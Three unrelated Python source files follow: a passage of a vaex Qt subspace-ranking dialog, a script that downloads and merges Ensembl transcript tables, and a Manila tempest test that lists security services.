checkbox = self.checkboxes[index]
checkbox.setCheckState(QtCore.Qt.Unchecked)
def select(self, pair):
index = self.pairs.index(pair)
print(("deselect", pair, index))
checkbox = self.checkboxes[index]
checkbox.setCheckState(QtCore.Qt.Checked)
def setPairs(self, pairs):
# selection = [checkbox.checkState() == QtCore.Qt.Checked for checkbox in self.checkboxes]
# non_selected_pairs = [pair for pair, selected in zip(self.pairs, selection) if not selected]
self.pairs = list(pairs)
for pair in self.pairs:
if pair not in self.selected_dict:
self.selected_dict[pair] = self.properties.get(".".join(pair) + ".use", "True")
self.filter_mask = np.array([True for pair in pairs])
self.fill_table()
# self.checkboxes = []
# self.setRowCount(len(self.pairs))
# self.setVerticalHeaderLabels(map(str, range(len(self.pairs))))
# for i in range(len(self.pairs)):
# text = " ".join(map(str, self.pairs[i]))
# print text
# item = QtGui.QTableWidgetItem(text)
# item.setFlags(self.defaultFlags)
# self.setItem(i, 1, item)
# checkbox = self.checkboxes[i] #QtGui.QCheckBox(self)
# if not (self.pairs[i] in non_selected_pairs):
# checkbox.setCheckState(QtCore.Qt.Checked)
# self.checkboxes.append(checkbox)
# self.setCellWidget(i, 0, checkbox)
# print self.checkboxes
def set_filter_terms(self, filter_terms):
def filter(pair):
found = True
for filter_term in filter_terms:
found_term = False
for expression in pair:
found_term = found_term or filter_term.lower() in expression.lower()
found = found and found_term
return found
self.filter_terms = filter_terms
# print list, filter, self.pairs
self.filter_mask = np.array([filter(pair) for pair in self.pairs])
self.queue_fill_table()
# self.fill_table()
def joinpairs(pairs1d, pairsNd):
previous = []
for pair1d in pairs1d:
subspacename = pair1d[0] # tuple only has one element
for pairNd in pairsNd:
if subspacename not in pairNd:
pair = pair1d + pairNd
if sorted(pair) not in previous:
previous.append(sorted(pair))
# print previous
yield pair
class RankDialog(QtGui.QDialog):
def __init__(self, dataset, parent, mainPanel, **options):
super(RankDialog, self).__init__(parent)
self.dataset = dataset
self.mainPanel = mainPanel
self.range_map = {}
self.grid_size = int(options.get("grid_size", "32"))
# print "options", options
self.properties = collections.OrderedDict() # Properties()
if self.dataset.is_local():
self.properties_path = os.path.splitext(self.dataset.path)[0] + ".properties"
else:
dir = os.path.join(vaex.utils.get_private_dir(), "ranking")
if not os.path.exists(dir):
os.makedirs(dir)
server = self.dataset.server
name = "%s_%s_%s_%s" % (server.hostname, server.port, server.base_path.replace("/", "_"), self.dataset.name)
self.properties_path = os.path.join(dir, name + ".properties")
self.properties_path = options.get("file", self.properties_path)
if os.path.exists(self.properties_path):
self.load_properties()
else:
pass
# if not os.access(properties_path, os.W_OK):
# dialog_error(self, "File access", "Cannot write to %r, so cannot save options" % properties_path)
self.tabs = QtGui.QTabWidget(self)
self.tab1d = QtGui.QWidget(self.tabs)
self.table1d = SubspaceTable(self, self.tab1d, mainPanel, self.dataset, list(itertools.combinations(unique_column_names(self.dataset), 1)), 1, self.properties)
self.subspaceTables = {}
self.subspaceTabs = {}
self.subspaceTables[1] = self.table1d
self.subspaceTabs[1] = self.tab1d
def onclick(dim=2):
self.open(dim=dim)
self.subspace2d = QtGui.QPushButton("create 2d subspaces", self.tab1d)
self.subspace2d.clicked.connect(functools.partial(onclick, dim=2))
self.get_ranges_menu = QtGui.QMenu()
self.button_get_ranges = QtGui.QToolButton()
self.button_get_ranges.setText("calculate min/max")
self.button_get_ranges.setPopupMode(QtGui.QToolButton.InstantPopup)
# self.button_get_ranges.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon)
self.get_ranges_menu = QtGui.QMenu()
self.button_get_ranges.setMenu(self.get_ranges_menu)
self.action_ranges_minmax = QtGui.QAction("absolute min/max", self)
self.action_ranges_minmax_3sigma = QtGui.QAction("3 sigma clipping", self)
self.get_ranges_menu.addAction(self.action_ranges_minmax)
self.get_ranges_menu.addAction(self.action_ranges_minmax_3sigma)
# self.button_get_ranges = QtGui.QToolButton(self.tab1d)
# self.button_get_ranges.setText("calculate min/max")
# self.button_get_ranges.setM
self.action_ranges_minmax.triggered.connect(self.onCalculateMinMax)
self.action_ranges_minmax_3sigma.triggered.connect(self.onCalculateMinMax3Sigma)
self.button_store = QtGui.QToolButton(self.tab1d)
self.button_store.setText("store")
self.button_store.clicked.connect(self.onStore)
self.actions_menu = QtGui.QMenu()
self.button_actions = QtGui.QToolButton()
self.button_actions.setText("Extra")
self.button_actions.setPopupMode(QtGui.QToolButton.InstantPopup)
self.button_actions.setMenu(self.actions_menu)
self.action_select_all = QtGui.QAction("Select all", self)
self.action_select_none = QtGui.QAction("Select none", self)
self.action_remove_empty = QtGui.QAction("Remove empty columns", self)
self.action_pca = QtGui.QAction("PCA transformation", self)
self.action_select_all.triggered.connect(self.onSelectAll)
self.action_select_none.triggered.connect(self.onSelectNone)
self.action_remove_empty.triggered.connect(self.onRemoveEmpty)
self.action_pca.triggered.connect(self.onPca)
self.actions_menu.addAction(self.action_select_all)
self.actions_menu.addAction(self.action_select_none)
self.actions_menu.addAction(self.action_remove_empty)
self.actions_menu.addSeparator()
self.actions_menu.addAction(self.action_pca)
self.tab1dlayout = QtGui.QVBoxLayout(self)
self.tab1d_button_layout = QtGui.QHBoxLayout(self)
self.tab1dlayout.addLayout(self.tab1d_button_layout)
self.tab1d_button_layout.addWidget(self.subspace2d)
self.tab1d_button_layout.addWidget(self.button_get_ranges)
self.tab1d_button_layout.addWidget(self.button_store)
self.tab1d_button_layout.addWidget(self.button_actions)
self.filter_line_edit = QtGui.QLineEdit(self)
self.filter_line_edit.setPlaceholderText("Enter space seperated search terms")
self.filter_line_edit.textEdited.connect(functools.partial(self.onFilter, table=self.table1d))
self.tab1dlayout.addWidget(self.filter_line_edit)
self.tab1dlayout.addWidget(self.table1d)
# self.tab1dlayout.addWidget(self.rankButton)
# self.setCentralWidget(self.splitter)
self.tab1d.setLayout(self.tab1dlayout)
self.tabs.addTab(self.tab1d, "1d")
self.resize(700, 500)
if 0:
for name in self.dataset.column_names:
item = QtGui.QListWidgetItem(self.list1d)
item.setText(name)
item.setCheckState(False)
# self.list1d.
self.boxlayout = QtGui.QVBoxLayout(self)
self.gridlayout = QtGui.QGridLayout()
self.gridlayout.setColumnStretch(1, 1)
self.gridlayout.setSpacing(0)
self.gridlayout.setContentsMargins(2, 1, 2, 1)
self.gridlayout.setAlignment(QtCore.Qt.AlignTop)
row = 1
self.selection_label = QtGui.QLabel("Use for computations:", self)
self.gridlayout.addWidget(self.selection_label, row, 0)
self.radio_button_all = QtGui.QRadioButton("Complete dataset", self)
self.radio_button_selection = QtGui.QRadioButton("Selection", self)
self.radio_button_all.setChecked(True)
self.gridlayout.addWidget(self.radio_button_all, row, 1)
row += 1
self.gridlayout.addWidget(self.radio_button_selection, row, 1)
row += 1
def get():
return str(self.grid_size)
def set(value):
self.grid_size = int(value)
self.option_grid_size = Option(self, "grid size (for mutual info)", "32 64 128 256".split(), get, set)
row = self.option_grid_size.add_to_grid_layout(row, self.gridlayout)
# self.gridlayout.addWidget(self.option_grid_size.combobox); row += 1
# self.gridlayout.addWidget(self.option_grid_size.combobox); row += 1
self.boxlayout.addLayout(self.gridlayout)
self.boxlayout.addWidget(self.tabs)
# self.boxlayout.addWidget(self.rankButton)
# self.setCentralWidget(self.splitter)
self.setLayout(self.boxlayout)
if "2" in options.get("open", ""):
self.open(dim=2)
if "3" in options.get("open", ""):
self.open(dim=3)
if "4" in options.get("open", ""):
self.open(dim=4)
self.fill_range_map()
def open(self, dim=2):
pairs1d = self.subspaceTables[1].getSelected()
pairsprevd = self.subspaceTables[dim - 1].getSelected()
# print pairs1d
# print pairsprevd
newpairs = list(joinpairs(pairs1d, pairsprevd))
print(("newpairs", newpairs))
if dim not in self.subspaceTables:
self.tabNd = QtGui.QWidget(self.tabs)
self.tableNd = SubspaceTable(self, self.tabNd, self.mainPanel, self.dataset, newpairs, dim, self.properties)
self.tabNdlayout = QtGui.QVBoxLayout(self)
self.tabNdButtonLayout = QtGui.QHBoxLayout(self)
self.subspaceNd = QtGui.QPushButton("Create %dd subspaces" % (dim + 1), self.tab1d)
self.plotNd = QtGui.QPushButton("Rank plot")
self.exportNd = QtGui.QPushButton("Export ranking")
if dim == len(self.dataset.column_names):
self.subspaceNd.setDisabled(True)
self.menu_calculate = QtGui.QMenu()
self.button_calculate = QtGui.QToolButton()
self.button_calculate.setText("Calculate")
self.button_calculate.setPopupMode(QtGui.QToolButton.InstantPopup)
# self.button_get_ranges.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon)
self.button_calculate.setMenu(self.menu_calculate)
self.tabNdButtonLayout.addWidget(self.subspaceNd)
self.tabNdButtonLayout.addWidget(self.button_calculate)
# self.tabNdButtonLayout.addWidget(self.miNd)
# self.tabNdButtonLayout.addWidget(self.correlationNd)
self.tabNdButtonLayout.addWidget(self.exportNd)
self.tabNdButtonLayout.addWidget(self.plotNd)
self.tabNdlayout.addLayout(self.tabNdButtonLayout)
self.subspaceNd.clicked.connect(functools.partial(self.open, dim=dim + 1))
self.exportNd.clicked.connect(functools.partial(self.export, table=self.tableNd))
self.plotNd.clicked.connect(functools.partial(self.rank_plot, table=self.tableNd))
self.action_calculate_mi = QtGui.QAction("Calculate mutual information", self)
self.action_calculate_correlation = QtGui.QAction("Calculate correlation", self)
self.action_calculate_mi.triggered.connect(functools.partial(self.rankSubspaces, table=self.tableNd))
self.action_calculate_correlation.triggered.connect(functools.partial(self.calculate_correlation, table=self.tableNd))
self.menu_calculate.addAction(self.action_calculate_mi)
self.menu_calculate.addAction(self.action_calculate_correlation)
self.action_calculate_rank_correlation_MI_corr_kendall = QtGui.QAction("MI - correlation", self)
self.action_calculate_rank_correlation_MI_abs_corr_kendall = QtGui.QAction("MI - abs(correlation)", self)
self.action_calculate_rank_correlation_MI_corr_spearman = QtGui.QAction("MI - correlation", self)
self.action_calculate_rank_correlation_MI_abs_corr_spearman = QtGui.QAction("MI - abs(correlation)", self)
self.menu_correlation_kendall = self.menu_calculate.addMenu("Kendall's rank correlation")
self.menu_correlation_spearman = self.menu_calculate.addMenu("Spearman's rank correlation")
self.menu_correlation_kendall.setEnabled(False)
self.menu_correlation_spearman.setEnabled(False)
self.menu_correlation_kendall.addAction(self.action_calculate_rank_correlation_MI_corr_kendall)
self.menu_correlation_kendall.addAction(self.action_calculate_rank_correlation_MI_abs_corr_kendall)
self.menu_correlation_spearman.addAction(self.action_calculate_rank_correlation_MI_corr_spearman)
self.menu_correlation_spearman.addAction(self.action_calculate_rank_correlation_MI_abs_corr_spearman)
self.action_calculate_rank_correlation_MI_corr_kendall.triggered.connect(functools.partial(self.calculate_rank_correlation_kendall, table=self.tableNd))
self.action_calculate_rank_correlation_MI_abs_corr_kendall.triggered.connect(functools.partial(self.calculate_rank_correlation_kendall, table=self.tableNd, absolute=True))
self.action_calculate_rank_correlation_MI_corr_spearman.triggered.connect(functools.partial(self.calculate_rank_correlation_spearman, table=self.tableNd))
self.action_calculate_rank_correlation_MI_abs_corr_spearman.triggered.connect(functools.partial(self.calculate_rank_correlation_spearman, table=self.tableNd, absolute=True))
def func(index, name=""):
print((name, index.row(), index.column()))
self.tableNd.pressed.connect(functools.partial(func, name="pressed"))
self.tableNd.entered.connect(functools.partial(func, name="entered"))
self.tableNd.clicked.connect(functools.partial(func, name="clicked"))
self.tableNd.activated.connect(functools.partial(func, name="activated"))
def func(index, previous, name=""):
print((name, index.row(), index.column(), previous.row(), previous.column()))
self.selectionModel = self.tableNd.selectionModel()
self.selectionModel.currentChanged.connect(functools.partial(func, name="currentChanged"))
self.filter_Nd_line_edit = QtGui.QLineEdit(self)
self.filter_Nd_line_edit.setPlaceholderText("Enter space seperated search terms")
self.filter_Nd_line_edit.textEdited.connect(functools.partial(self.onFilter, table=self.tableNd))
self.tabNdlayout.addWidget(self.filter_Nd_line_edit)
self.tabNdlayout.addWidget(self.tableNd)
# self.tab1dlayout.addWidget(self.rankButton)
# self.setCentralWidget(self.splitter)
self.tabNd.setLayout(self.tabNdlayout)
self.subspaceTables[dim] = self.tableNd
self.subspaceTabs[dim] = self.tabNd
self.tabs.addTab(self.tabNd, "%dd" % dim)
self.tabs.setCurrentWidget(self.tabNd)
else:
self.subspaceTables[dim].setPairs(newpairs)
self.tabs.setCurrentWidget(self.subspaceTabs[dim])
def onPca(self):
# vaex.pca.
pass
def onFilter(self, text, table):
table.set_filter_terms(text.split())
def onStore(self):
selected_pairs = self.table1d.getSelected()
# error = False
for pair in self.table1d.pairs:
key = str(pair[0])
# print repr(key+".use"), repr(pair in selected_pairs)
self.properties[key + ".use"] = repr(pair in selected_pairs)
if key in self.range_map:
mi, ma = self.range_map[key]
self.properties[key + ".min"] = repr(mi)
self.properties[key + ".max"] = repr(ma)
else:
print(("min/max not present", key))
print(("save to", self.properties_path))
self.store_properties()
dialog_info(self, "Stored", "Stored configuration to: %r" % self.properties_path)
def load_properties(self):
with open(self.properties_path, "rb") as f:
self.properties = jprops.load_properties(f, collections.OrderedDict)
def store_properties(self):
with open(self.properties_path, "wb") as f:
jprops.store_properties(f, self.properties)
def fill_range_map(self):
pairs = self.table1d.getSelected()
for pair in pairs:
mi, ma = self.table1d.get_range(pair)
if mi is not None and ma is not None:
self.range_map[pair[0]] = mi, ma
def onSelectAll(self):
pairs = self.table1d.pairs
for pair in pairs:
self.table1d.select(pair)
def onSelectNone(self):
pairs = self.table1d.pairs
for pair in pairs:
self.table1d.deselect(pair)
def onRemoveEmpty(self):
self.fill_range_map()
pairs = self.table1d.getSelected()
error = False
for pair in pairs:
print(pair)
if pair[0] in self.range_map:
min, max = self.range_map[pair[0]]
if min == max:
print((pair, "empty", min, max))
self.table1d.deselect(pair)
else:
if not error: # only give a warning once
dialog_error(self, "Min/max missing", "Min max missing for %s" % pair)
error = True
def onCalculateMinMax(self):
pairs = self.table1d.getSelected()
logger.debug("estimate min/max for %r" % pairs)
if self.dataset.is_local():
executor = vaex.execution.Executor(buffer_size=buffer_size)
else:
executor = vaex.remote.ServerExecutor()
expressions = [pair[0] for pair in pairs]
assert len(pairs[0]) == 1
self.range_map = {}
try:
with dialogs.ProgressExecution(self, "Calculating min/max", executor=executor) as progress:
subspace = self.dataset.subspace(*expressions, executor=executor, delay=True)
minmax = subspace.minmax()
progress.add_task(minmax).end()
progress.execute()
ranges = minmax.get()
self.table1d.setRanges(pairs, ranges)
self.fill_range_map()
except:
logger.exception("Error in min/max or cancelled")
# dialog.hide()
def onCalculateMinMax3Sigma(self):
pairs = self.table1d.getSelected()
expressions = [pair[0] for pair in pairs]
if self.dataset.is_local():
executor = vaex.execution.Executor(buffer_size=buffer_size)
else:
executor = vaex.remote.ServerExecutor()
if self.dataset.is_local():
executor = vaex.execution.Executor()
else:
executor = vaex.remote.ServerExecutor()
subspace = self.dataset.subspace(*expressions, executor=executor, delay=True)
means = subspace.mean()
with dialogs.ProgressExecution(self, "Calculating mean", executor=executor) as progress:
progress.add_task(means).end()
progress.execute()
logger.debug("get means")
means = means.get()
logger.debug("got means")
vars = subspace.var(means=means)
with dialogs.ProgressExecution(self, "Calculating variance", executor=executor) as progress:
progress.add_task(vars).end()
progress.execute()
# limits = limits.get()
vars = vars.get()
stds = vars**0.5
sigmas = 3
ranges = list(zip(means - sigmas * stds, means + sigmas * stds))
self.table1d.setRanges(pairs, ranges)
self.fill_range_map()
def calculate_rank_correlation_kendall(self, table, absolute=False):
print(("kendall", table, absolute))
pairs = table.getSelected()
mi_values = [table.qualities[pair] for pair in pairs]
correlation_values = [table.correlation_map[pair] for pair in pairs]
ranking_mi = np.argsort(mi_values)
if absolute:
ranking_correlation = np.argsort(np.abs(correlation_values))
else:
ranking_correlation = np.argsort(correlation_values)
N = len(pairs)
A = np.zeros((N, N))
B = np.zeros((N, N))
for i in range(N):
for j in range(N):
A[i, j] = np.sign(ranking_mi[i] - ranking_mi[j])
B[i, j] = np.sign(ranking_correlation[i] - ranking_correlation[j])
AB = 0
AA = 0
BB = 0
for i in range(N):
for j in range(N):
AB += A[i, j] * B[i, j]
AA += A[i, j]**2
BB += B[i, j]**2
def calculate_rank_correlation_spearman(self, table, absolute=False):
print(("spearman", table, absolute))
def calculate_correlation(self, table):
print(("calculate correlation for ", table))
pairs = table.getSelected()
expressions = set()
for pair in pairs:
for expression in pair:
expressions.add(expression)
expressions = list(expressions)
if self.dataset.is_local():
executor = vaex.execution.Executor(buffer_size=buffer_size)
else:
executor = vaex.remote.ServerExecutor()
def on_error(exc):
raise exc
if 1:
# subspace = self.dataset(*expressions, executor=executor, delay=True)
subspaces = self.dataset.subspaces(pairs, executor=executor, delay=True)
means_promise = subspaces.mean()
# print means_promise, type(means_promise), subs
with dialogs.ProgressExecution(self, "Calculating means", executor=executor) as progress:
progress.add_task(means_promise)
progress.execute()
means = means_promise.get()
variances_promise = subspaces.var(means=means)
with dialogs.ProgressExecution(self, "Calculating variances", executor=executor) as progress:
progress.add_task(variances_promise)
progress.execute()
vars = variances_promise.get()
# means = subspaces._unpack(means_packed)
# vars = subspaces._unpack(vars_packed)
tasks = []
with dialogs.ProgressExecution(self, "Calculating correlation", executor=executor) as progress:
for subspace, mean, var in zip(subspaces.subspaces, means, vars):
task = subspace.correlation(means=mean, vars=var)
progress.add_task(task).end()
tasks.append(task)
progress.execute()
correlations = [task.get() for task in tasks]
correlation_map = dict(zip(pairs, correlations))
table.set_correlations(correlation_map)
return
# mean_map = dict(zip(expressions, means))
# var_map = dict(zip(expressions, variances))
else:
mean_map = {}
def on_error(exc):
raise exc
for expression in expressions:
subspace = self.dataset(expression, executor=executor, delay=True)
def assign(mean_list, expression=expression):
logger.debug("assigning %r to %s", mean_list, expression)
mean_map[expression] = mean_list
subspace.mean().then(assign, on_error).end()
with dialogs.ProgressExecution(self, "Calculating means", executor=executor):
executor.execute()
var_map = {}
for expression in expressions:
subspace = self.dataset(expression, executor=executor, delay=True)
def assign(mean_list, expression=expression):
logger.debug("assigning %r to %s", mean_list, expression)
var_map[expression] = mean_list[0].tolist()
subspace.var(means=mean_map[expression]).then(assign, on_error).end()
with dialogs.ProgressExecution(self, "Calculating variances", executor=executor):
executor.execute()
means = [mean_map[expressions[0]] for expressions in pairs]
variances = [var_map[expressions[0]] for expressions in pairs]
correlation_map = {}
for pair in pairs:
means = [mean_map[expression] for expression in pair]
vars = [var_map[expression] for expression in pair]
subspace = self.dataset(*pair, executor=executor, delay=True)
def assign(correlation, pair=pair):
logger.debug("assigning %r to %s", correlation, pair)
correlation_map[pair] = correlation
subspace.correlation(means, vars).then(assign, on_error).end()
with dialogs.ProgressExecution(self, "Calculating correlation", executor=executor):
executor.execute()
table.set_correlations(correlation_map)
return
jobsManager = vaex.dataset.JobsManager()
expressions = set()
for pair in pairs:
for expression in pair:
expressions.add(expression)
expressions = list(expressions)
print("means")
with ProgressExecution(self, "Calculating means") as progress:
means = jobsManager.calculate_mean(self.dataset, use_mask=self.radio_button_selection.isChecked(), expressions=expressions, feedback=progress.progress)
mean_map = dict(list(zip(expressions, means)))
centered_expressions_map = {expression: "(%s - %.20e)" % (expression, mean) for (expression, mean) in list(mean_map.items())}
variances_expressions_map = {expression: "%s**2" % centered_expressions for expression, centered_expressions in list(centered_expressions_map.items())}
with ProgressExecution(self, "Calculating variances") as progress:
variances = jobsManager.calculate_mean(self.dataset, use_mask=self.radio_button_selection.isChecked(), expressions=list(variances_expressions_map.values()), feedback=progress.progress)
variances_map = dict(list(zip(list(variances_expressions_map.keys()), variances)))
covariances_expressions = []
for pair in pairs:
centered_expressions = [centered_expressions_map[expression] for expression in pair]
covariance_expression = "*".join(centered_expressions)
covariances_expressions.append(covariance_expression)
print(covariances_expressions)
with ProgressExecution(self, "Calculating covariances") as progress:
# progress.progress(20)
covariances = jobsManager.calculate_mean(self.dataset, use_mask=self.radio_button_selection.isChecked(), expressions=covariances_expressions, feedback=progress.progress)
# progress.progress(20)
print(variances)
print(covariances)
correlation_map = {}
for pair, covariance in zip(pairs, covariances):
normalization = 1
for expression in pair:
normalization *= np.sqrt(variances_map[expression])
correlation_map[pair] = covariance / normalization
table.set_correlations(correlation_map)
return
def export(self, table):
print(("export", table))
basename, ext = os.path.splitext(self.dataset.path)
path = basename + ("-ranking-%dd" % table.dim) + ".properties"
filename = get_path_save(self, path=path, title="Export ranking", file_mask="properties file *.properties")
expressions = set()
if filename:
counts = 0
with open(filename, "w") as file:
for pair in table.pairs:
if pair in table.qualities:
file.write("%s.mutual_information=%f\n" % (".".join(pair), table.qualities[pair]))
counts += 1
if pair in table.correlation_map:
file.write("%s.correlation_coefficient=%f\n" % (".".join(pair), table.correlation_map[pair]))
counts += 1
expressions.update(pair)
for expression in expressions:
mi, ma = self.range_map[expression]
file.write("%s.min=%f\n" % (expression, mi))
file.write("%s.max=%f\n" % (expression, ma))
dialog_info(self, "Wrote ranking file", "wrote %d lines" % counts)
def rankSubspaces(self, table):
self.fill_range_map()
pairs = table.getSelected()
error = False
ranges = []
for pair in pairs:
for expression in pair:
if expression not in self.range_map:
error = True
print(("missing", expression))
if error:
dialog_error(self, "Missing min/max", "Please calculate the minimum and maximum for the dimensions")
return
# expressions = [pair[0] for pair in pairs]
# executor = vaex.execution.Executor(buffer_size=buffer_size)
if self.dataset.is_local():
executor = vaex.execution.Executor(buffer_size=buffer_size)
else:
executor = vaex.remote.ServerExecutor()
tasks = []
with dialogs.ProgressExecution(self, "Calculating mutual information", executor=executor) as progress:
for pair in pairs:
limits = [self.range_map[expr] for expr in pair]
task = self.dataset(*pair, executor=executor, delay=True).mutual_information(limits=limits, size=self.grid_size)
progress.add_task(task).end()
tasks.append(task)
if not progress.execute():
return
logger.debug("get means")
mutual_information = [task.get() for task in tasks]
# mutual_information_list = [MI_map[pair] for pair in pairs]
table.setQualities(pairs, mutual_information)
return
print(table)
qualities = []
pairs = table.getSelected()
if 0:
for pair in pairs:
dim = len(pair)
# if dim == 2:
columns = [self.dataset.columns[name] for name in pair]
print(pair)
information = vaex.kld.kld_shuffled(columns, mask=mask)
qualities.append(information)
# print pair
if 0:
dialog = QtGui.QProgressDialog("Calculating Mutual information", "Abort", 0, 1000, self)
dialog.show()
def feedback(percentage):
print(percentage)
dialog.setValue(int(percentage * 10))
QtCore.QCoreApplication.instance().processEvents()
if dialog.wasCanceled():
return True
with ProgressExecution(self, "Calculating Mutual information") as progress:
qualities = vaex.kld.kld_shuffled_grouped(self.dataset, self.range_map, pairs, feedback=progress.progress, use_mask=self.radio_button_selection.isChecked())
# dialog.hide()
if qualities is not None:
print(qualities)
table.setQualities(pairs, qualities)
def rank_plot(self, table):
plot = RankPlot(self, table)
plot.show()
|
|
# Copyright (c) 2014. Mount Sinai School of Medicine
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from os.path import exists
import hashlib
import base64
import logging
import pandas as pd
import datacache
from datacache import build_path
def fetch_file(url, decompress = True):
return datacache.fetch_file(url, decompress = decompress, subdir = "immuno")
STANDARD_CONTIGS = set([
'1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14',
'15', '16', '17', '18', '19', '20', '21', '22', 'X', 'Y', 'M'
])
# TODO: Generously describe what all these files are
GENE_HEADER = [
'gene_id', 'biotype', 'analysis_id',
'seq_region_id', 'seq_region_start', 'seq_region_end',
'seq_region_strand', 'display_xref_id',
'source', 'status', 'description', 'is_current',
'canonical_transcript_id', 'stable_id',
'version', 'created_date', 'modified_date'
]
GENE_DATA_URL = \
"ftp://ftp.ensembl.org/pub/release-75/mysql/homo_sapiens_core_75_37/gene.txt.gz"
SEQ_REGION_HEADER = ['seq_region_id', 'name', 'coord_system_id']
SEQ_REGION_DATA_URL = \
"ftp://ftp.ensembl.org/pub/release-75/mysql/homo_sapiens_core_75_37/seq_region.txt.gz"
EXON_HEADER = [
"exon_id", "seq_region_id", "seq_region_start",
"seq_region_end", "seq_region_strand", "phase", "end_phase",
"is_current", "is_constitutive", "stable_id", "version",
"created_date", "modified_date"
]
EXON_DATA_URL = \
"ftp://ftp.ensembl.org/pub/release-75/mysql/homo_sapiens_core_75_37/exon.txt.gz"
TRANSCRIPT_HEADER = [
"transcript_id", "gene_id", "analysis_id",
"seq_region_id", "seq_region_start", "seq_region_end",
"seq_region_strand", "display_xref_id", "source", "biotype", "status",
"description", "is_current", "canonical_translation_id", "stable_id",
"version", "created_date", "modified_date"
]
TRANSCRIPT_DATA_URL = \
"ftp://ftp.ensembl.org/pub/release-75/mysql/homo_sapiens_core_75_37/transcript.txt.gz"
EXON_TRANSCRIPT_DATA_URL = \
"ftp://ftp.ensembl.org/pub/release-75/mysql/homo_sapiens_core_75_37/exon_transcript.txt.gz"
TRANSLATION_HEADER = [
"translation_id", "transcript_id", "seq_start",
"start_exon_id", "seq_end", "end_exon_id",
"stable_id","version", "created_date", "modified_date"
]
TRANSLATION_DATA_URL = \
"ftp://ftp.ensembl.org/pub/release-75/mysql/homo_sapiens_core_75_37/translation.txt.gz"
def short_hash(s, n = 4):
return base64.urlsafe_b64encode(hashlib.sha1(s).digest())[:n]
def versioned_filename(base, deps, ext):
"""
Create a unique filename based on some URL dependencies
by adding a subset of each URL's hash to a base name.
"""
result = base
for dep in deps:
result = result + "_" + short_hash(dep)
return result + "." + ext
def download_transcript_metadata(filter_contigs = STANDARD_CONTIGS):
output_filename = versioned_filename(
"transcript_metadata",
deps = [
GENE_DATA_URL,
SEQ_REGION_DATA_URL,
EXON_DATA_URL,
TRANSCRIPT_DATA_URL,
TRANSLATION_DATA_URL],
ext = "tsv")
full_path = build_path(output_filename, subdir = "immuno")
logging.info("Transcript metadata path %s", full_path)
if not exists(full_path):
GENE_DATA_PATH = fetch_file(GENE_DATA_URL)
SEQ_REGION_DATA_PATH = fetch_file(SEQ_REGION_DATA_URL)
EXON_DATA_PATH = fetch_file(EXON_DATA_URL)
TRANSCRIPT_DATA_PATH = fetch_file(TRANSCRIPT_DATA_URL)
TRANSLATION_DATA_PATH = fetch_file(TRANSLATION_DATA_URL)
EXON_TRANSCRIPT_DATA_PATH = fetch_file(EXON_TRANSCRIPT_DATA_URL)
seqregion = pd.read_csv(
SEQ_REGION_DATA_PATH,
sep='\t',
names = SEQ_REGION_HEADER,
index_col=False)
def in_filter_contigs(x):
return x in filter_contigs
if filter_contigs:
seqregion = seqregion[seqregion['name'].map(in_filter_contigs)]
# TODO: Ask Arun what's going on here, leave a good explanation
gene = pd.read_csv(
GENE_DATA_PATH,
sep='\t',
names = GENE_HEADER,
index_col=False)
seqregion_gene = gene.merge(seqregion, on='seq_region_id')
transcript = pd.read_csv(
TRANSCRIPT_DATA_PATH, sep='\t',
names = TRANSCRIPT_HEADER,
index_col=False)
translation = pd.read_csv(
TRANSLATION_DATA_PATH, sep='\t',
names = TRANSLATION_HEADER,
index_col=False)
transcript = transcript.merge(
translation,
on='transcript_id',
suffixes = ['', '_translation'])
gene_transcript = transcript.merge(
seqregion_gene,
on='gene_id',
suffixes = ['', '_gene'])
exon = pd.read_csv(
EXON_DATA_PATH,
sep='\t',
names=EXON_HEADER,
index_col=False)
exon_transcript = pd.read_csv(
EXON_TRANSCRIPT_DATA_PATH,
sep='\t',
names=['exon_id', 'transcript_id', 'rank'])
exon_w_exon_transcript = pd.merge(
exon,
exon_transcript,
on='exon_id',
suffixes=('_exon', '_et'))
exon_w_transcript = pd.merge(
exon_w_exon_transcript,
gene_transcript,
on='transcript_id',
suffixes=('_exon', '_transcript'))
print exon_w_transcript.columns
exon_cols = [
'name',
'stable_id_gene',
'description_gene',
'seq_region_start_gene',
'seq_region_end_gene',
'seq_region_strand_gene',
'stable_id_transcript',
'seq_region_start_transcript',
'seq_region_end_transcript',
'seq_start',
'start_exon_id',
'seq_end',
'end_exon_id',
'stable_id_translation',
'stable_id_exon',
'exon_id',
'rank',
'phase',
'seq_region_start_exon',
'seq_region_end_exon']
exon_data = exon_w_transcript[exon_cols]
exon_data.to_csv(full_path, index=False, sep='\t')
return full_path
|
|
# Copyright 2014 Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log
import six
from tempest import config
import testtools
from testtools import testcase as tc
from manila_tempest_tests.tests.api import base
CONF = config.CONF
LOG = log.getLogger(__name__)
class SecurityServiceListMixin(object):
@tc.attr(base.TAG_POSITIVE, base.TAG_API)
def test_list_security_services(self):
listed = self.shares_client.list_security_services()
self.assertTrue(any(self.ss_ldap['id'] == ss['id'] for ss in listed))
self.assertTrue(any(self.ss_kerberos['id'] == ss['id']
for ss in listed))
# verify keys
keys = ["name", "id", "status", "type", ]
[self.assertIn(key, s_s.keys()) for s_s in listed for key in keys]
@tc.attr(base.TAG_POSITIVE, base.TAG_API)
def test_list_security_services_with_detail(self):
listed = self.shares_client.list_security_services(detailed=True)
self.assertTrue(any(self.ss_ldap['id'] == ss['id'] for ss in listed))
self.assertTrue(any(self.ss_kerberos['id'] == ss['id']
for ss in listed))
# verify keys
keys = [
"name", "id", "status", "description",
"domain", "server", "dns_ip", "user", "password", "type",
"created_at", "updated_at", "project_id",
]
[self.assertIn(key, s_s.keys()) for s_s in listed for key in keys]
